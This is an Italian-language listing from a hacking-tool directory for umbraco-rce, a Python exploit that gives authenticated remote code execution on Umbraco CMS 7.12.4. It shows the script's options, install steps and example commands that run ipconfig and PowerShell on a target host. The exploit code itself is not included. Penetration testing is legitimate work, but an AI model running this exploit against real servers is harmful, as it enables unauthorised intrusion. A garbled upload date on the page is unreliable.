Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Umbraco-RCE — Umbraco CMS 7.12.4 - Esecuzione di codice in remoto (autenticato) | Kitploit
Strumenti/GitHubGitHub/noraj/umbraco-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubnoraj/umbraco-rce

Umbraco-RCE

Umbraco CMS 7.12.4 - Esecuzione di codice in remoto (autenticato)

Vedi Repository
79405 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

Exploit RCE / PoC per Umbraco

Umbraco CMS 7.12.4 - Esecuzione remota di codice (autenticata)

[EDB-49488] [PacketStorm] [WLB-2020080012]

Utilizzo

root@kitploit:~
$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

Esempi:

root@kitploit:~
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Requisiti

  • Beautiful Soup
  • Requests

Esempio per ArchLinux:

root@kitploit:~
pacman -S python-beautifulsoup4 python-requests

Esempio con pip:

root@kitploit:~
pip3 install -r requirements.txt

Riferimenti

Questa è una riscrittura migliore di EDB-ID-46153 che utilizza argomenti (invece di valori hardcoded) e mostra l'output su stdout.

Testato con python 3.8.

Scarica lo strumento